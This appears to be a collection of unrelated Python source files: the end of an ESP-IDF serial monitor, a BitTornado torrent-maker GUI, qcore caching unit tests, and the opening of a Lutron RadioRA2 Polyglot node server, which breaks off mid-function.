"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="End of line to use when sending to the serial port",
default='CRLF')
parser.add_argument(
'elf_file', help='ELF file of application',
type=argparse.FileType('r'))
parser.add_argument(
'--save_file','-sf', help='save the serial file',
type=str)
args = parser.parse_args()
if args.port.startswith("/dev/tty."):
args.port = args.port.replace("/dev/tty.", "/dev/cu.")
yellow_print("--- WARNING: Serial ports accessed as /dev/tty.* will hang gdb if launched.")
yellow_print("--- Using %s instead..." % args.port)
serial_instance = serial.serial_for_url(args.port, args.baud,
do_not_open=True)
serial_instance.dtr = False
serial_instance.rts = False
args.elf_file.close() # don't need this as a file
# remove the parallel jobserver arguments from MAKEFLAGS, as any
# parent make is only running 1 job (monitor), so we can re-spawn
# all of the child makes we need (the -j argument remains part of
# MAKEFLAGS)
try:
makeflags = os.environ["MAKEFLAGS"]
makeflags = re.sub(r"--jobserver[^ =]*=[0-9,]+ ?", "", makeflags)
os.environ["MAKEFLAGS"] = makeflags
except KeyError:
pass # not running a make jobserver
global file_handler
file_handler=open(args.save_file,'w')
monitor = Monitor(serial_instance, args.elf_file.name, args.make, args.toolchain_prefix, args.eol)
yellow_print('--- idf_monitor on {p.name} {p.baudrate} ---'.format(
p=serial_instance))
yellow_print('--- Quit: {} | Menu: {} | Help: {} followed by {} ---'.format(
key_description(monitor.exit_key),
key_description(monitor.menu_key),
key_description(monitor.menu_key),
key_description(CTRL_H)))
monitor.main_loop()
if os.name == 'nt':
# Windows console stuff
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# wincon.h values
FOREGROUND_INTENSITY = 8
FOREGROUND_GREY = 7
# matches the ANSI color change sequences that IDF sends
RE_ANSI_COLOR = re.compile(b'\033\\[([01]);3([0-7])m')
# list mapping the 8 ANSI colors (the indexes) to Windows Console colors
ANSI_TO_WINDOWS_COLOR = [ 0, 4, 2, 6, 1, 5, 3, 7 ]
GetStdHandle = ctypes.windll.kernel32.GetStdHandle
SetConsoleTextAttribute = ctypes.windll.kernel32.SetConsoleTextAttribute
class ANSIColorConverter(object):
"""Class to wrap a file-like output stream, intercept ANSI color codes,
and convert them into calls to Windows SetConsoleTextAttribute.
Doesn't support all ANSI terminal code escape sequences, only the sequences IDF uses.
Ironically, in Windows this console output is normally wrapped by winpty which will then detect the console text
color changes and convert these back to ANSI color codes for MSYS' terminal to display. However this is the
least-bad working solution, as winpty doesn't support any "passthrough" mode for raw output.
"""
def __init__(self, output):
self.output = output
self.handle = GetStdHandle(STD_ERROR_HANDLE if self.output == sys.stderr else STD_OUTPUT_HANDLE)
self.matched = b''
def write(self, data):
for b in data:
l = len(self.matched)
if b == '\033': # ESC
self.matched = b
elif (l == 1 and b == '[') or (1 < l < 7):
self.matched += b
if self.matched == ANSI_NORMAL: # reset console
SetConsoleTextAttribute(self.handle, FOREGROUND_GREY)
self.matched = b''
elif len(self.matched) == 7: # could be an ANSI sequence
m = re.match(RE_ANSI_COLOR, self.matched)
if m is not None:
color = ANSI_TO_WINDOWS_COLOR[int(m.group(2))]
if m.group(1) == b'1':
color |= FOREGROUND_INTENSITY
SetConsoleTextAttribute(self.handle, color)
else:
self.output.write(self.matched) # not an ANSI color code, display verbatim
self.matched = b''
else:
self.output.write(b)
self.matched = b''
def flush(self):
self.output.flush()
if __name__ == "__main__":
main()
|
btmaketorrentgui.py
|
#!/usr/bin/env python
# Written by Bram Cohen
# modified for multitracker by John Hoffman
# see LICENSE.txt for license information
import sys
import os
import threading
from BitTornado.BT1.makemetafile import make_meta_file, completedir
from BitTornado.Info import MetaInfo
try:
from wxPython import wx
except:
print 'wxPython is not installed or has not been installed properly.'
sys.exit(1)
wxEVT_INVOKE = wx.wxNewEventType()
def EVT_INVOKE(win, func):
win.Connect(-1, -1, wxEVT_INVOKE, func)
class InvokeEvent(wx.wxPyEvent):
def __init__(self, func, args, kwargs):
super(InvokeEvent, self).__init__()
self.SetEventType(wxEVT_INVOKE)
self.func = func
self.args = args
self.kwargs = kwargs
class DownloadInfo:
def __init__(self):
frame = wx.wxFrame(None, -1, 'BitTorrent Torrent File Maker',
size=wx.wxSize(550, 410))
self.frame = frame
panel = wx.wxPanel(frame, -1)
gridSizer = wx.wxFlexGridSizer(cols=2, rows=2, vgap=0, hgap=8)
gridSizer.Add(wx.wxStaticText(panel, -1, 'make torrent of:'))
b = wx.wxBoxSizer(wx.wxHORIZONTAL)
self.dirCtl = wx.wxTextCtrl(panel, -1, '')
b.Add(self.dirCtl, 1, wx.wxEXPAND)
# b.Add(10, 10, 0, wxEXPAND)
button = wx.wxButton(panel, -1, 'dir', size=(30, 20))
wx.EVT_BUTTON(frame, button.GetId(), self.selectdir)
b.Add(button, 0)
button2 = wx.wxButton(panel, -1, 'file', size=(30, 20))
wx.EVT_BUTTON(frame, button2.GetId(), self.selectfile)
b.Add(button2, 0)
gridSizer.Add(b, 0, wx.wxEXPAND)
gridSizer.Add(wx.wxStaticText(panel, -1, ''))
gridSizer.Add(wx.wxStaticText(panel, -1, ''))
gridSizer.Add(wx.wxStaticText(panel, -1, 'announce url:'))
self.annCtl = wx.wxTextCtrl(panel, -1,
'http://my.tracker:6969/announce')
gridSizer.Add(self.annCtl, 0, wx.wxEXPAND)
gridSizer.Add(wx.wxStaticText(panel, -1, ''))
gridSizer.Add(wx.wxStaticText(panel, -1, ''))
a = wx.wxFlexGridSizer(cols=1)
a.Add(wx.wxStaticText(panel, -1, 'announce list:'))
a.Add(wx.wxStaticText(panel, -1, ''))
abutton = wx.wxButton(panel, -1, 'copy\nannounces\nfrom\ntorrent',
size=(50, 70))
wx.EVT_BUTTON(frame, abutton.GetId(), self.announcecopy)
a.Add(abutton, 0, wx.wxEXPAND)
gridSizer.Add(a, 0, wx.wxEXPAND)
self.annListCtl = wx.wxTextCtrl(
panel, -1, '\n\n\n\n\n', wx.wxPoint(-1, -1), (400, 120),
wx.wxTE_MULTILINE | wx.wxHSCROLL | wx.wxTE_DONTWRAP)
gridSizer.Add(self.annListCtl, -1, wx.wxEXPAND)
gridSizer.Add(wx.wxStaticText(panel, -1, ''))
exptext = wx.wxStaticText(
panel, -1, 'a list of announces separated by commas or whitespace '
'and on several lines -\ntrackers on the same line will be tried '
'randomly, and all the trackers on one line\nwill be tried before '
'the trackers on the next line.')
exptext.SetFont(wx.wxFont(6, wx.wxDEFAULT, wx.wxNORMAL, wx.wxNORMAL,
False))
gridSizer.Add(exptext)
gridSizer.Add(wx.wxStaticText(panel, -1, ''))
gridSizer.Add(wx.wxStaticText(panel, -1, ''))
gridSizer.Add(wx.wxStaticText(panel, -1, 'piece size:'))
self.piece_length = wx.wxChoice(
panel, -1, choices=['automatic', '2MiB', '1MiB', '512KiB',
'256KiB', '128KiB', '64KiB', '32KiB'])
self.piece_length_list = [0, 21, 20, 19, 18, 17, 16, 15]
self.piece_length.SetSelection(0)
gridSizer.Add(self.piece_length)
gridSizer.Add(wx.wxStaticText(panel, -1, ''))
gridSizer.Add(wx.wxStaticText(panel, -1, ''))
gridSizer.Add(wx.wxStaticText(panel, -1, 'comment:'))
self.commentCtl = wx.wxTextCtrl(panel, -1, '')
gridSizer.Add(self.commentCtl, 0, wx.wxEXPAND)
gridSizer.AddGrowableCol(1)
border = wx.wxBoxSizer(wx.wxVERTICAL)
border.Add(gridSizer, 0,
wx.wxEXPAND | wx.wxNORTH | wx.wxEAST | wx.wxWEST, 25)
b2 = wx.wxButton(panel, -1, 'make')
# border.Add(10, 10, 1, wxEXPAND)
border.Add(b2, 0, wx.wxALIGN_CENTER | wx.wxSOUTH, 20)
wx.EVT_BUTTON(frame, b2.GetId(), self.complete)
panel.SetSizer(border)
panel.SetAutoLayout(True)
# panel.DragAcceptFiles(True)
# EVT_DROP_FILES(panel, self.selectdrop)
def selectdir(self, x):
dl = wx.wxDirDialog(
self.frame, style=wx.wxDD_DEFAULT_STYLE | wx.wxDD_NEW_DIR_BUTTON)
if dl.ShowModal() == wx.wxID_OK:
self.dirCtl.SetValue(dl.GetPath())
def selectfile(self, x):
dl = wx.wxFileDialog(self.frame, 'Choose file or directory to use', '',
'', '', wx.wxOPEN)
if dl.ShowModal() == wx.wxID_OK:
self.dirCtl.SetValue(dl.GetPath())
def selectdrop(self, x):
print x
# list = x.m_files
self.dirCtl.SetValue(x[0])
def announcecopy(self, x):
dl = wx.wxFileDialog(self.frame, 'Choose .torrent file to use', '', '',
'*.torrent', wx.wxOPEN)
if dl.ShowModal() == wx.wxID_OK:
try:
metainfo = MetaInfo.read(dl.GetPath())
self.annCtl.SetValue(metainfo['announce'])
if 'announce-list' in metainfo:
self.annListCtl.SetValue(
'\n'.join(', '.join(tier) for tier in
metainfo['announce-list']) + '\n' * 3)
else:
self.annListCtl.SetValue('')
except:
return
def getannouncelist(self):
annList = filter(bool, self.annListCtl.GetValue().split('\n'))
return [filter(bool, tier.replace(',', ' ').split())
for tier in annList]
def complete(self, x):
if self.dirCtl.GetValue() == '':
dlg = wx.wxMessageDialog(
self.frame, message='You must select a\n file or directory',
caption='Error', style=wx.wxOK | wx.wxICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
params = {
'piece_size_pow2': self.piece_length_list[
self.piece_length.GetSelection()]
}
annlist = self.getannouncelist()
if len(annlist) > 0:
params['real_announce_list'] = annlist
comment = self.commentCtl.GetValue()
if comment != '':
params['comment'] = comment
try:
CompleteDir(self.dirCtl.GetValue(), self.annCtl.GetValue(), params)
except:
print_exc()
from traceback import print_exc
class CompleteDir:
def __init__(self, d, a, params):
self.d = d
self.a = a
self.params = params
self.flag = threading.Event()
self.separatetorrents = False
if os.path.isdir(d):
self.choicemade = threading.Event()
frame = wx.wxFrame(None, -1, 'BitTorrent make torrent',
size=(1, 1))
self.frame = frame
panel = wx.wxPanel(frame, -1)
gridSizer = wx.wxFlexGridSizer(cols=1, vgap=8, hgap=8)
gridSizer.AddGrowableRow(1)
gridSizer.Add(wx.wxStaticText(
panel, -1, 'Do you want to make a separate .torrent'), 0,
wx.wxALIGN_CENTER)
gridSizer.Add(wx.wxStaticText(
panel, -1, 'for every item in this directory?'), 0,
wx.wxALIGN_CENTER)
gridSizer.Add(wx.wxStaticText(panel, -1, ''))
b = wx.wxFlexGridSizer(cols=3, hgap=10)
yesbut = wx.wxButton(panel, -1, 'Yes')
def saidyes(e, self=self):
self.frame.Destroy()
self.separatetorrents = True
self.begin()
wx.EVT_BUTTON(frame, yesbut.GetId(), saidyes)
b.Add(yesbut, 0)
nobut = wx.wxButton(panel, -1, 'No')
def saidno(e, self=self):
self.frame.Destroy()
self.begin()
wx.EVT_BUTTON(frame, nobut.GetId(), saidno)
b.Add(nobut, 0)
cancelbut = wx.wxButton(panel, -1, 'Cancel')
def canceled(e, self=self):
self.frame.Destroy()
wx.EVT_BUTTON(frame, cancelbut.GetId(), canceled)
b.Add(cancelbut, 0)
gridSizer.Add(b, 0, wx.wxALIGN_CENTER)
border = wx.wxBoxSizer(wx.wxHORIZONTAL)
border.Add(gridSizer, 1, wx.wxEXPAND | wx.wxALL, 4)
panel.SetSizer(border)
panel.SetAutoLayout(True)
frame.Show()
border.Fit(panel)
frame.Fit()
else:
self.begin()
def begin(self):
if self.separatetorrents:
frame = wx.wxFrame(None, -1, 'BitTorrent make directory',
size=wx.wxSize(550, 250))
else:
frame = wx.wxFrame(None, -1, 'BitTorrent make torrent',
size=wx.wxSize(550, 250))
self.frame = frame
panel = wx.wxPanel(frame, -1)
gridSizer = wx.wxFlexGridSizer(cols=1, vgap=15, hgap=8)
if self.separatetorrents:
self.currentLabel = wx.wxStaticText(panel, -1,
'checking file sizes')
else:
self.currentLabel = wx.wxStaticText(
panel, -1, 'building ' + self.d + '.torrent')
gridSizer.Add(self.currentLabel, 0, wx.wxEXPAND)
self.gauge = wx.wxGauge(panel, -1, range=1000, style=wx.wxGA_SMOOTH)
gridSizer.Add(self.gauge, 0, wx.wxEXPAND)
gridSizer.Add((10, 10), 1, wx.wxEXPAND)
self.button = wx.wxButton(panel, -1, 'cancel')
gridSizer.Add(self.button, 0, wx.wxALIGN_CENTER)
gridSizer.AddGrowableRow(2)
gridSizer.AddGrowableCol(0)
g2 = wx.wxFlexGridSizer(cols=1, vgap=15, hgap=8)
g2.Add(gridSizer, 1, wx.wxEXPAND | wx.wxALL, 25)
g2.AddGrowableRow(0)
g2.AddGrowableCol(0)
panel.SetSizer(g2)
panel.SetAutoLayout(True)
wx.EVT_BUTTON(frame, self.button.GetId(), self.done)
wx.EVT_CLOSE(frame, self.done)
EVT_INVOKE(frame, self.onInvoke)
frame.Show(True)
threading.Thread(target=self.complete).start()
def complete(self):
try:
if self.separatetorrents:
completedir(self.d, self.a, self.params, self.flag,
self.valcallback, self.filecallback)
else:
make_meta_file(self.d, self.a, self.params, self.flag,
self.valcallback, progress_percent=1)
if not self.flag.isSet():
self.currentLabel.SetLabel('Done!')
self.gauge.SetValue(1000)
self.button.SetLabel('Close')
self.frame.Refresh()
except (OSError, IOError) as e:
self.currentLabel.SetLabel('Error!')
self.button.SetLabel('Close')
dlg = wx.wxMessageDialog(
self.frame, message='Error - ' + str(e), caption='Error',
style=wx.wxOK | wx.wxICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
def valcallback(self, amount):
self.invokeLater(self.onval, [amount])
def onval(self, amount):
self.gauge.SetValue(int(amount * 1000))
def filecallback(self, f):
self.invokeLater(self.onfile, [f])
def onfile(self, f):
self.currentLabel.SetLabel(
'building ' + os.path.join(self.d, f) + '.torrent')
def onInvoke(self, event):
if not self.flag.isSet():
apply(event.func, event.args, event.kwargs)
def invokeLater(self, func, args=[], kwargs={}):
if not self.flag.isSet():
wx.wxPostEvent(self.frame, InvokeEvent(func, args, kwargs))
def done(self, event):
self.flag.set()
self.frame.Destroy()
class btWxApp(wx.wxApp):
def OnInit(self):
d = DownloadInfo()
d.frame.Show(True)
self.SetTopWindow(d.frame)
return True
if __name__ == '__main__':
btWxApp().MainLoop()
|
test_caching.py
|
# Copyright 2016 Quora, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from qcore.caching import (
LRUCache, miss, cached_per_instance, memoize, memoize_with_ttl,
LazyConstant, ThreadLocalLazyConstant, lazy_constant, not_computed, lru_cache
)
from qcore.asserts import assert_eq, assert_ne, assert_is, assert_in, assert_not_in, AssertRaises
import qcore
import threading
try:
import mock
from mock import MagicMock, call
import cPickle as pickle
except ImportError:
from unittest import mock
from unittest.mock import MagicMock, call
import pickle
class TestLazyConstant(object):
def test_decorator(self):
self.is_computed = False
@lazy_constant
def test_function():
assert_is(False, self.is_computed, 'test_function has been called more than once')
self.is_computed = True
return 42
assert_eq(42, test_function())
assert_eq(42, test_function())
assert self.is_computed, 'test_function has not been called'
def test_not_compute(self):
lazy_constant = LazyConstant(lambda: not_computed)
assert_is(None, lazy_constant.compute())
assert_is(None, lazy_constant.get_value())
def test_clear(self):
lazy_constant = LazyConstant(qcore.utime)
lazy_time = lazy_constant.get_value()
with qcore.TimeOffset(qcore.HOUR):
assert_eq(lazy_time, lazy_constant.get_value(), tolerance=qcore.MINUTE)
lazy_constant.clear()
assert_ne(lazy_time, lazy_constant.get_value(), tolerance=qcore.MINUTE)
def test_compute_clear(self):
def test_function():
self.is_called = True
return 42
lazy_constant = LazyConstant(test_function)
assert_eq(42, lazy_constant.compute())
assert self.is_called, 'test_function has not been called'
self.is_called = False
assert_eq(42, lazy_constant.compute())
assert self.is_called, 'test_function has not been called'
class TestThreadLocalLazyConstant(object):
def test_thread_locality(self):
lazy_constant = ThreadLocalLazyConstant(threading.current_thread)
results = []
lock = threading.RLock()
def execute():
with lock:
results.append(lazy_constant.get_value())
threads = [threading.Thread(target=execute) for i in range(5)]
[thread.start() for thread in threads]
[thread.join() for thread in threads]
assert_eq(5, len(results))
assert_eq(5, len(set(results)))
def test_not_compute(self):
lazy_constant = ThreadLocalLazyConstant(lambda: not_computed)
assert_is(None, lazy_constant.compute())
assert_is(None, lazy_constant.get_value())
def test_clear(self):
lazy_constant = ThreadLocalLazyConstant(qcore.utime)
lazy_time = lazy_constant.get_value()
with qcore.TimeOffset(qcore.HOUR):
assert_eq(lazy_time, lazy_constant.get_value(), tolerance=qcore.MINUTE)
lazy_constant.clear()
assert_ne(lazy_time, lazy_constant.get_value(), tolerance=qcore.MINUTE)
def test_compute_clear(self):
def test_function():
self.is_called = True
return 42
lazy_constant = ThreadLocalLazyConstant(test_function)
assert_eq(42, lazy_constant.compute())
assert self.is_called, 'test_function has not been called'
self.is_called = False
assert_eq(42, lazy_constant.compute())
assert self.is_called, 'test_function has not been called'
class TestLRUCache(object):
def test_deletion(self):
# Zero capacity cache is not allowed
with AssertRaises(ValueError):
c = LRUCache(0)
# Capacity = 1
c = LRUCache(1)
c[0] = '0'
c[1] = '1'
assert_eq(1, len(c))
assert_eq('1', c[1])
assert_is(miss, c.get(2))
del c[1]
assert_eq(0, len(c))
# Capacity = 2
c = LRUCache(2)
c[0] = '0'
c[1] = '1'
c[2] = '2'
del c[1]
assert_eq(1, len(c))
assert_is(miss, c.get(1))
assert_eq('2', c[2])
c = LRUCache(2)
c[0] = '0'
c[1] = '1'
c[2] = '2'
del c[2]
assert_eq(1, len(c))
assert_eq('1', c[1])
assert_is(miss, c.get(2))
# Capacity = 3
c = LRUCache(3)
c[0] = '0'
c[1] = '1'
c[2] = '2'
c[3] = '3'
del c[2]
assert_eq(2, len(c))
assert_is(miss, c.get(2))
assert_eq('1', c[1])
assert_eq('3', c[3])
# Deletion of invalid item
with AssertRaises(KeyError):
del c[15]
def test_eviction(self):
on_eviction = MagicMock()
c = LRUCache(1, on_eviction)
c[0] = '0'
c[1] = '1'
assert_eq(1, on_eviction.call_count)
on_eviction.assert_called_once_with(0, '0')
on_eviction.reset_mock()
del c[1]
assert_eq(1, on_eviction.call_count)
on_eviction.assert_called_once_with(1, '1')
def _check_order(self, expected, cache):
items = expected
keys = [item[0] for item in items]
values = [item[1] for item in items]
assert_eq(keys, list(cache))
assert_eq(keys, list(cache.keys()))
assert_eq(values, list(cache.values()))
assert_eq(items, list(cache.items()))
def test_iteration(self):
c = LRUCache(3)
c[0] = 'a'
c[1] = 'b'
c[2] = 'c'
self._check_order([(0, 'a'), (1, 'b'), (2, 'c')], c)
def test_getitem(self):
c = LRUCache(3)
c[0] = 'a'
c[1] = 'b'
c[2] = 'c'
assert_eq(3, c.get_capacity())
self._check_order([(0, 'a'), (1, 'b'), (2, 'c')], c)
# Getting a value should make it MRU
assert_eq('b', c[1])
self._check_order([(0, 'a'), (2, 'c'), (1, 'b')], c)
# Missing value should fail
with AssertRaises(KeyError):
c[100]
def test_get(self):
c = LRUCache(3)
c[0] = 'a'
c[1] = 'b'
c[2] = 'c'
# Getting a value should make it MRU
assert_in(1, c)
assert_eq('b', c.get(1))
self._check_order([(0, 'a'), (2, 'c'), (1, 'b')], c)
# Missing value should have no effect
assert_not_in(100, c)
assert_eq(miss, c.get(100))
self._check_order([(0, 'a'), (2, 'c'), (1, 'b')], c)
def test_sets(self):
c = LRUCache(3)
c[0] = 'a'
c[1] = 'b'
c[2] = 'c'
# Updating a value should make it MRU
c[0] = 'd'
assert_in(0, c)
self._check_order([(1, 'b'), (2, 'c'), (0, 'd')], c)
# Update order and evict the LRU item
c[3] = 'e'
assert_in(3, c)
self._check_order([(2, 'c'), (0, 'd'), (3, 'e')], c)
def test_clear(self):
on_evict = MagicMock()
c = LRUCache(3, on_evict)
c[0] = 'a'
c[1] = 'b'
c[2] = 'c'
c.clear()
self._check_order([], c)
assert_eq(3, on_evict.call_count)
assert_eq([call(0, 'a'), call(1, 'b'), call(2, 'c')],
on_evict.call_args_list)
def test_lru_cache():
@lru_cache(maxsize=1, key_fn=lambda args, kwargs: args[0] % 2 == 0)
def cube(n):
return n * n * n
assert_eq(1, cube(1))
# hit the cache
assert_eq(1, cube(3))
# cache miss
assert_eq(8, cube(2))
# now it's a cache miss
assert_eq(27, cube(3))
class TestClass(object):
__hash__ = None # not hashable
def __init__(self, val):
self.val = val
self.x = 0
@cached_per_instance()
def get_x(self):
self.x += self.val
return self.x
@cached_per_instance()
def with_kwargs(self, x=1, y=2, z=3):
self.x += (x + y + z)
return self.x
def test_cached_per_instance():
get_x_cache = TestClass.get_x.__cached_per_instance_cache__
with_kwargs_cache = TestClass.with_kwargs.__cached_per_instance_cache__
assert_eq(0, len(get_x_cache), extra=repr(get_x_cache))
assert_eq(0, len(with_kwargs_cache), extra=repr(with_kwargs_cache))
object1 = TestClass(1)
object2 = TestClass(2)
assert_eq(object1.x, 0)
assert_eq(object2.x, 0)
assert_eq(object1.get_x(), 1)
assert_eq(1, len(get_x_cache), extra=repr(get_x_cache))
assert_eq(0, len(with_kwargs_cache), extra=repr(with_kwargs_cache))
assert_eq(object1.x, 1)
assert_eq(object2.x, 0)
assert_eq(object1.get_x(), 1)
assert_eq(1, len(get_x_cache), extra=repr(get_x_cache))
assert_eq(0, len(with_kwargs_cache), extra=repr(with_kwargs_cache))
assert_eq(object1.x, 1)
assert_eq(object2.x, 0)
assert_eq(object2.get_x(), 2)
assert_eq(2, len(get_x_cache), extra=repr(get_x_cache))
assert_eq(0, len(with_kwargs_cache), extra=repr(with_kwargs_cache))
assert_eq(object1.x, 1)
assert_eq(object2.x, 2)
assert_eq(7, object1.with_kwargs())
assert_eq(7, object1.with_kwargs(x=1))
assert_eq(7, object1.with_kwargs())
assert_eq(16, object1.with_kwargs(x=3, y=3, z=3))
assert_eq(2, len(get_x_cache), extra=repr(get_x_cache))
assert_eq(1, len(with_kwargs_cache), extra=repr(with_kwargs_cache))
del object1
assert_eq(1, len(get_x_cache), extra=repr(get_x_cache))
assert_eq(0, len(with_kwargs_cache), extra=repr(with_kwargs_cache))
del object2
assert_eq(0, len(get_x_cache), extra=repr(get_x_cache))
assert_eq(0, len(with_kwargs_cache), extra=repr(with_kwargs_cache))
class PickleTestClass(object):
@cached_per_instance()
def f(self, x):
return x
def test_cached_per_instance_pickling():
# make sure cached stuff doesn't appear in the pickled representation
obj = PickleTestClass()
obj.attr = 'spam'
assert_eq(set(), set(PickleTestClass.f.__cached_per_instance_cache__.keys()))
obj.f('my hovercraft is full of eels')
assert_eq({id(obj)}, set(PickleTestClass.f.__cached_per_instance_cache__.keys()))
serialized = pickle.dumps(obj)
assert_not_in(b'my hovercraft is full of eels', serialized)
assert_in(b'spam', serialized)
restored = pickle.loads(serialized)
assert_eq({id(obj)}, set(PickleTestClass.f.__cached_per_instance_cache__.keys()))
restored.f('my hovercraft is full of eels')
assert_eq({id(obj), id(restored)}, set(PickleTestClass.f.__cached_per_instance_cache__.keys()))
assert_eq('spam', obj.attr)
# make sure we can use this with a custom __getstate__
class X(object):
@cached_per_instance()
def f(self, x):
return x
def __getstate__(self):
return {}
X().f(1)
x = 0
@memoize
def cached_fn(y, z=4):
global x
x += 1
return y * z
memoize_fns = [cached_fn]
try:
exec("""
@memoize
def cached_fn_with_annotations(y: int, z: int=4) -> int:
global x
x += 1
return y * z
@memoize
def cached_fn_with_kwonly_args(y, *, z):
global x
x += 1
return y * z
""")
except SyntaxError:
pass
else:
memoize_fns.append(cached_fn_with_annotations)
def test_memoize_with_kwonly_args():
global x
x = 0
with AssertRaises(TypeError):
cached_fn_with_kwonly_args(1)
with AssertRaises(TypeError):
cached_fn_with_kwonly_args(1, 2)
assert_eq(0, x)
assert_eq(4, cached_fn_with_kwonly_args(2, z=2))
assert_eq(1, x)
assert_eq(4, cached_fn_with_kwonly_args(z=2, y=2))
assert_eq(1, x)
assert_eq(8, cached_fn_with_kwonly_args(2, z=4))
assert_eq(2, x)
assert_eq(8, cached_fn_with_kwonly_args(y=2, z=4))
assert_eq(2, x)
cached_fn_with_kwonly_args.clear_cache()
assert_eq(4, cached_fn_with_kwonly_args(2, z=2))
assert_eq(3, x)
@memoize_with_ttl(ttl_secs=500)
def cached_fn_with_ttl(y, z=4):
global x
x += 1
return y * z
@memoize_with_ttl(ttl_secs=500)
def cached_fn_with_ttl_unhashable(y, z={'a': 1, 'b': 2, 'c': 3}):
global x
x += 1
return y * (z['a'] + z['b'] + z['c'])
def test_memoize():
"""Test Caching with no Time-To-Live (TTL)."""
global x
for fn in memoize_fns:
x = 0
assert_eq(4, fn(1))
assert_eq(1, x)
assert_eq(8, fn(2, 4))
assert_eq(2, x)
# should not result in another call
assert_eq(8, fn(2, z=4))
assert_eq(2, x)
assert_eq(8, fn(y=2, z=4))
assert_eq(2, x)
fn.clear_cache()
assert_eq(4, fn(1))
assert_eq(3, x)
def test_memoize_with_ttl():
"""Test Caching with Time-To-Live (TTL)."""
global x
x = 0
then = 10000
just_after = 10005
now = 10700
with mock.patch('time.time') as mock_time:
mock_time.return_value = then
assert_eq(4, cached_fn_with_ttl(1))
assert_eq(1, x)
with mock.patch('time.time') as mock_time:
mock_time.return_value = just_after
assert_eq(8, cached_fn_with_ttl(2, 4))
assert_eq(2, x)
# should not result in another call
assert_eq(8, cached_fn_with_ttl(2, z=4))
assert_eq(2, x)
assert_eq(8, cached_fn_with_ttl(y=2, z=4))
assert_eq(2, x)
# after the ttl expires, should result in another call
with mock.patch('time.time') as mock_time:
mock_time.return_value = now
assert_eq(8, cached_fn_with_ttl(2, z=4))
assert_eq(3, x)
assert_eq(8, cached_fn_with_ttl(y=2, z=4))
assert_eq(3, x)
cached_fn_with_ttl.clear_cache()
assert_eq(4, cached_fn_with_ttl(1))
assert_eq(4, x)
assert_eq(8, cached_fn_with_ttl(2, z=4))
assert_eq(5, x)
# test dirtying a key.
# first, the key should be cached
assert_eq(8, cached_fn_with_ttl(2, z=4))
assert_eq(5, x)
cached_fn_with_ttl.dirty(2, z=4)
# now, we should recompute the function
assert_eq(8, cached_fn_with_ttl(2, z=4))
assert_eq(6, x)
def test_memoize_with_ttl_unhashable():
"""Test Caching with TTL using dictionary arguments."""
global x
x = 0
assert_eq(12, cached_fn_with_ttl_unhashable(2))
assert_eq(1, x)
assert_eq(10, cached_fn_with_ttl_unhashable(1, z={'a': 2, 'b': 3, 'c': 5}))
assert_eq(2, x)
# should not result in another call
assert_eq(10, cached_fn_with_ttl_unhashable(1, z={'a': 2, 'b': 3, 'c': 5}))
assert_eq(2, x)
assert_eq(12, cached_fn_with_ttl_unhashable(2, z={'a': 1, 'b': 2, 'c': 3}))
assert_eq(2, x)
cached_fn_with_ttl_unhashable.clear_cache()
assert_eq(12, cached_fn_with_ttl_unhashable(2))
assert_eq(3, x)
|
lutron-poly.py
|
#!/usr/bin/env python3
"""
LiFX NodeServer for UDI Polyglot v2
by Einstein.42 (James Milne) milne.james@gmail.com
"""
import polyinterface
import time
import sys
from copy import deepcopy
import json
import pylutron
from threading import Thread
from pathlib import Path
import math
LOGGER = polyinterface.LOGGER
with open('server.json') as data:
SERVERDATA = json.load(data)
data.close()
try:
VERSION = SERVERDATA['credits'][0]['version']
except (KeyError, ValueError):
LOGGER.info('Version not found in server.json.')
VERSION = '0.0.0'
class Controller(polyinterface.Controller):
def __init__(self, polyglot):
super().__init__(polyglot)
self.lutron = None
self.name = 'Lutron RadioRA2'
self.discovery_thread = None
self.update_nodes = False
self.master_repeater_ip = None
self.username = 'lutron'
self.password = 'integration'
def start(self):
LOGGER.info(f'Starting {self.name} Polyglot v2 NodeServer ')
if 'username' in self.polyConfig['customParams']:
self.username = self.polyConfig['customParams']['username']
LOGGER.debug(f'Username overridden to {self.username}')
if 'password' in self.polyConfig['customParams']:
self.password = self.polyConfig['customParams']['password']
LOGGER.debug('Password overridden.')
if 'main_repeater_ip' not in self.polyConfig['customParams']:
LOGGER.fatal('main_repeater_ip must be specified.')
return False
self._checkProfile()
self.discover()
LOGGER.debug('Start complete')
def stop(self):
LOGGER.info(f'Stopping {self.name} Polyglot v2 NodeServer')
# TODO: Do we need this?
def _checkProfile(self):
profile_version_file = Path('profile/version.txt')
if profile_version_file.is_file() and 'customData' in self.polyConfig:
with profile_version_file.open() as f:
profile_version = f.read().replace('\n', '')
f.close()
if 'prof_ver' in self.polyConfig['customData']:
if self.polyConfig['customData']['prof_ver'] != profile_version:
self.update_nodes = True
else:
self.update_nodes = True
if self.update_nodes:
LOGGER.info('New Profile Version detected: {}, all nodes will be updated'.format(profile_version))
cust_data = deepcopy(self.polyConfig['customData'])
cust_data['prof_ver'] = profile_version
self.saveCustomData(cust_data)
self.updateNode(self)
def shortPoll(self):
if self.discovery_thread is not None:
if self.discovery_thread.is_alive():
LOGGER.debug('Skipping shortPoll() while discovery in progress...')
return
else:
self.discovery_thread = None
for node in self.nodes:
self.nodes[node].update()
def longPoll(self):
if self.discovery_thread is not None:
if self.discovery_thread.is_alive():
LOGGER.debug('Skipping longPoll() while discovery in progress...')
return
else:
self.discovery_thread = None
for node in self.nodes:
self.nodes[node].long_update()
def update(self):
pass
def long_update(self):
pass
def discover(self, command=None):
self.lutron = pylutron.Lutron(self.master_repeater_ip, self.username, self.password)
if self.discovery_thread is not None:
if self.discovery_thread.is_alive():
LOGGER.info('Discovery is still in progress')
return
self.discovery_thread = Thread(target=self._discovery_process)
self.discovery_thread.start()
def _discovery_process(self):
LOGGER.info('Starting Lutron RadioRA2 Discovery thread...')
try:
devices = self.lifxLan.get_lights()
LOGGER.info('{} bulbs found. Checking status and adding to ISY if necessary.'.format(len(devices)))
for d in devices:
label = str(d.get_label())
name = 'LIFX {}'.format(label)
